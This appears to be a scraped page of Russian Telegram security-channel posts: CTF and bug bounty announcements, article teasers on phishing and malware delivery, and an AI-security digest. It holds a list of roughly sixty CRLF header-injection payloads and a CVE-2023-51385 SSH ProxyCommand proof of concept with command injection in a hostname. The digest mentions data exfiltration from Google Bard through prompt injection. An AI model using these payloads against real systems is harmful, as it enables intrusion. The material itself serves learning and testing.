Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
🏠 Телепортация в КиберДоме
#кибердом

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
😎 ВЗЛОМ НА ВЫСОТЕ 😎

Один мой очень хороший знакомый занимается физическим пентестом (сокр. физикой). Мало того, что у него очень интересный бекграунд, так он проворачивает анализы защищенности не хуже, чем в фильмах "Миссия невыполнима". Поэтому особенно советую прочитать его надеюсь последний в этом году, но не последний в будущем физический пентест.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥185👍5👎21
💙 Подарок на Новый Год от команды 🕐🕑🕒

Большое спасибо вам за сами подарки, за душевные и интересные мероприятия в этом году, за прекрасное обновление платформы BI.ZONE BugBounty 🪲
И отдельное спасибо ENZO, как от администратора канала, за приятную связь с админами телеграм каналов)

🔥 Желаю вам ещё бо́льших успехов в следующем году и щепотку удачи 😉

P.S. в посте не весь комплект, выбрал то что получилось красиво сфотографировать)
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥8🥰32👎22❤‍🔥1
🕛 CTF RedShift190 2023 🕛
#CTF

🏁 В недалёком будущем произошёл инцидент. Сможешь ли ты справиться с заданиями и провести расследование, как настоящий кибер-сыщик?

➡️ Колледж РТУ МИРЭА в период с 18 по 23 декабря проводится регистрация на CTF в онлайн формате. С 23 по 25 декабря пройдёт сама CTF. Мероприятие является открытым, приглашаются все желающие!

Твоя задача состоит из двух частей - сетевых дампов, по которым нужно расследовать происшествие, и ТГ-бота, ссылку на которого нам прислали из будущего. Не бойся сложностей: в решении помогут подсказки из архива воспоминаний потенциального нарушителя. За каждую часть можно получить 50 баллов.
И не забывай: больше - лучше. Зови с собой друзей, мы приветствуем коллаборации и не ограничиваем количество участников от одного учебного заведения или компании.

Присылай свою заявку через платформу онлайн-регистрации.
Еще больше информации - в 
ТГ-канале соревнований.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👾1
This media is not supported in your browser
VIEW IN TELEGRAM
🌚 New Year Poxek pack 🌚

🪄 У нас тут новые стикеры вышли. Прошу оценить их!

🌚 Новогоднего настроения вам!

💰 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥177🤣211
Forwarded from Standoff 365
🆕 Запускаем новую багбаунти-программу!

Что:
облачный межсетевой экран уровня веб-приложений PT Cloud Application Firewall

Где:
на Standoff 365 Bug Bounty

Когда:
с 20 декабря 2023 года по 20 января 2024 года

Продукт PT Cloud Application Firewall распространяется по ежемесячной подписке через технологических партнеров — авторизованных сервисных и облачных провайдеров.

По условиям программы, все зарегистрированные на платформе исследователи смогут, используя метод черного ящика, искать уязвимости в ресурсах, которые находятся на домене .ptcloud.ru.

Максимальное вознаграждение за найденные баги: 500 тысяч рублей. А тому, кто первым сдаст критическую уязвимость — мы подарим ящик нашего фирменного пива Блэк Хет.

⚡️ Начать искать баги

Итоги багбаунти-программы будут подведены 29 января 2024 года
Please open Telegram to view this post
VIEW IN TELEGRAM
👎4🔥4🤣1
This media is not supported in your browser
VIEW IN TELEGRAM
🔥1755👎1🥰1🌚11
😉 Немного про построение векторов атак

Как правило, домен на базе Active Directory обладает значительным количеством объектов, свойств и связей между ними. В общем случае «вручную» выявить недостатки в настройке домена и на их основе построить вероятный вектор атаки является довольно трудоемкой задачей и справится с ней без вспомогательных программных средств не представляется возможным.

В настоящем материале будет представлен обзор некоторых программных средств, использующихся для автоматизированного построения вероятных атак в домене. Кроме того, будут рассмотрены некоторые подходы к улучшению уже имеющихся решений, а также предложен собственный алгоритм к выявлению наиболее приоритетных целей атак.

📌 Важно отметить, что материал рассчитан на читателя, обладающего опытом по тестированию на проникновение Active Directory.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5🔥4👎1
CRLF Injection Payloads
#заметки

%0AHeader-Test:POXEK
%0A%20Header-Test:POXEK
%20%0AHeader-Test:POXEK
%23%OAHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
%3F%0AHeader-Test:POXEK
crlf%0AHeader-Test:POXEK
crlf%0A%20Header-Test:POXEK
crlf%20%0AHeader-Test:POXEK
crlf%23%OAHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
crlf%3F%0AHeader-Test:POXEK
%0DHeader-Test:POXEK
%0D%20Header-Test:POXEK
%20%0DHeader-Test:POXEK
%23%0DHeader-Test:POXEK
%23%0AHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
%3F%0DHeader-Test:POXEK
crlf%0DHeader-Test:POXEK
crlf%0D%20Header-Test:POXEK
crlf%20%0DHeader-Test:POXEK
crlf%23%0DHeader-Test:POXEK
crlf%23%0AHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
crlf%3F%0DHeader-Test:POXEK
%0D%0AHeader-Test:POXEK
%0D%0A%20Header-Test:POXEK
%20%0D%0AHeader-Test:POXEK
%23%0D%0AHeader-Test:POXEK
\r\nHeader-Test:POXEK
\r\n Header-Test:POXEK
\r\n Header-Test:POXEK
%5cr%5cnHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
%3F%0D%0AHeader-Test:POXEK
crlf%0D%0AHeader-Test:POXEK
crlf%0D%0A%20Header-Test:POXEK
crlf%20%0D%0AHeader-Test:POXEK
crlf%23%0D%0AHeader-Test:POXEK
crlf\r\nHeader-Test:POXEK
crlf%5cr%5cnHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
crlf%3F%0D%0AHeader-Test:POXEK
%0D%0A%09Header-Test:POXEK
crlf%0D%0A%09Header-Test:POXEK
%250AHeader-Test:POXEK
%25250AHeader-Test:POXEK
%%0A0AHeader-Test:POXEK
%25%30AHeader-Test:POXEK
%25%30%61Header-Test:POXEK
%u000AHeader-Test:POXEK
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:POXEK
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:POXEK
/google.com/%2F..%0D%0AHeader-Test:POXEK


🪄 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥92👎1
Картинка из утренней заметки, а то вдруг вы ее пропустили или посчитали неинтересной аннотацию 😊
922👎1
😈 IntruderPayloads

Коллекция полезных нагрузок BurpSuite Intruder, полезных нагрузок BurpBounty, списков fuzz листов и методов пентеста. Чтобы собрать все сторонние репозитории, запустите install.sh в той же директории, где находится папка IntruderPayloads.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
72👎1
Forwarded from PWN AI
👋 привет.

Вот и первый выпуск дайджеста по безопасности ИИ. Материалы честно позаимствованы с hackstery, что-то дополнено и адаптировано. Но надеюсь, вы поставите ⚡️⚡️⚡️ и скажете в комментах – а нужно ли оно ?)

💬 Безопасность LLM

Wunderwuzzi написал статью и выложил PoC для эксфильтрации данных через Google Bard. Он реализовал эксфильтрацию в google docs и обошёл CSP, однако Google уже пофиксили это (((


Layier.AI выпустили свой бенчмарк, в котором при помощи нескольких сканеров промтов оценивается - как тот или иной сканер отработает на Prompt Injection. Среди средств анализа включены следующие инструменты - LLMGuard, Lakera Guard и RebuffAI. Подробнее о том, почему они это сделали – читайте в их статье. Также, они улучшили свою модель Deberta, которая используется для обнаружения Prompt Injection.

Компания Meta* выпустила новые инструменты (Llama Guard и Purple Llama) для защиты входных и выходных данных при взаимодействии с большими языковыми моделями и предложила эталон для оценки рисков кибербезопасности в моделях. (тык, тык и тык)

🎨 Безопасность ИИ

Huntr написали статью для багхантинга в AI/ML. Часть инструментов вы и сами знаете, а часть была описана в этом канале.

Google выпустил инструмент для подписей моделей через Sigstore. Это фреймворк для обеспечения безопасности цепочки поставок машинного обучения.

Trail Of Bits обнаружили 11 уязвимостей в популярной модели для обнаружения объектов в реальном времени YOLOv7. Snyk уже может сканировать эту модель на уязвимости.

Среди этих уязвимостей есть целых 5 RCE.


Для обнаружения исследователи использовали свой набор правил для semgrep, TorchScript и CodeQl.


Помимо этого, они дали рекомендации по защите модели и уже сообщили разработчикам о данных находках.

🛠 Новые инструменты ИИ для кибербезопасности

Cisco выпустила своего AI-ассистента. Этот инструмент призван помочь безопасникам в настройке и поддержке политик брандмауэра в решениях Cisco. Ранее также Microsoft сделали свой Security Copilot

🤔 Интересно почитать

Кто контролирует OpenAI - статья от Bloomberg

🤔Размышления

Заменит ли ИИ безопасника

Жду ваших репостов и комментариев на этот счёт
Please open Telegram to view this post
VIEW IN TELEGRAM
7👎1😈11
🌚 Опасная рыбалка. Как фишинговые ресурсы маскируют под легитимные

Что такое фишинг, зна­ет и стар и млад, но поль­зовате­ли все рав­но про­дол­жают попадать­ся на улов­ки зло­умыш­ленни­ков. В этой статье мы рас­смот­рим фишин­говые ссыл­ки, а точ­нее, спо­собы их мас­киров­ки с исполь­зовани­ем офи­циаль­ных сай­тов извес­тных ком­паний и сер­висов.

От­кры­тым редирек­том в «1С‑Бит­рикс» уже никого не уди­вишь. Давай луч­ше рас­смот­рим, как кибер­прес­тупни­ки умуд­ряют­ся исполь­зовать archive.org, evernote.com, bing.com, microsoft.com, adobe.com и дру­гие трас­товые домены для того, что­бы обма­нуть довер­чивых поль­зовате­лей.

😹 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5🎄11
🌚 Письмо с сюрпризом. Изучаем уловки и хитрости для доставки писем с малварью

По ста­тис­тике зна­читель­ная часть зараже­ний мал­варью про­исхо­дит из‑за того, что поль­зователь сам запус­тил на сво­ей машине вре­донос­ный файл. Имен­но в этом и зак­люча­ется основная задача зло­умыш­ленни­ков, исполь­зующих соци­аль­ную инже­нерию. Давай пос­мотрим, какие тех­ничес­кие улов­ки и хит­рости они при­меня­ют.

Мы рас­смот­рим ата­ки с фай­лами не с точ­ки зре­ния того, как их дос­тавля­ют во вре­мя пен­теста и что в них пишут, что­бы поль­зователь повел­ся. Об этом мы погово­рим в дру­гой раз. Сегод­ня мы кос­немся нес­коль­ких тех­ничес­ких аспектов, вклю­чая мас­киров­ку фай­лов и рас­ширений, и обсу­дим некото­рые лай­фха­ки.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
82
🌚 OverTheWire Bandit
#лаба

Спонтанный пост для тех, кто ищет чем заняться на выходных)
Полезная головоломка для начинающих специалистов и "повторение - мать учения" для прожжённых самоварчиков.

Смысл сей авантюры в том, что вы с 0 до 34 уровня должны подключаться по ssh к следующему уровню. А как это сделать вам и придется выяснить :))
Эта игра будет полезна в первую очередь для начинающих в освоении Linux на базовом уровне и по ходу решения уровней, сможете постигать тонкости нативных утилит.

ssh bandit0@bandit.labs.overthewire.org -p 2220

🌲 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
103👎11
SSH ProxyCommand == RCE
CVE-2023-51385
#RCE

SSH’s ProxyCommand is a feature quite widely used to proxy ssh connections by allowing to specify custom commands to be used to connect to the server. Arguments to this directive may contain tokens like %h, %u which refer to hostname and username respectively.

When coming from untrusted sources, a hostname can be malicious and look something like malicious-command (backticks would allow a command to be executed in shell)

Malicious config:
Host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p


Latest PoC:
url = ssh://'`open -aCalculator`'foo.example.com/bar


Exploit: https://github.com/vin01/poc-proxycommand-vulnerable-v2

For Remediation you need update to:
OpenSSH 9.6p1
libssh 0.10.6 and 0.9.8

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👎10833
Forwarded from AKTIV.CONSULTING
⚡️Не пропустите свежий выпуск подкаста «Безопасный выход»!

Ведущие Анастасия Харыбина, Тимофей Матреницкий и приглашенный эксперт Алексей Петухов обсудили одну из самых актуальных тем для многих компаний — проблему кадрового голода 🍽

Участники подкаста рассмотрели:

откуда взялась проблема нехватки ИБ-кадров;

какие существуют регуляторные требования и профессиональные стандарты, и как они влияют на рынок;

что необходимо сделать для популяризации профессии ИБ-специалиста среди молодежи;

почему компаниям-лидерам отрасли важно объединяться для обмена опытом и лучшими методиками для подготовки сотрудников;

что стоит взять на вооружение организациям для решения проблем кадрового голода.


Смотрите и слушайте, где вам будет удобно:

📹 Youtube

💬 VK Видео

🎧 Аудио


Приятного просмотра и прослушивания!

#подкаст
Please open Telegram to view this post
VIEW IN TELEGRAM
72🔥21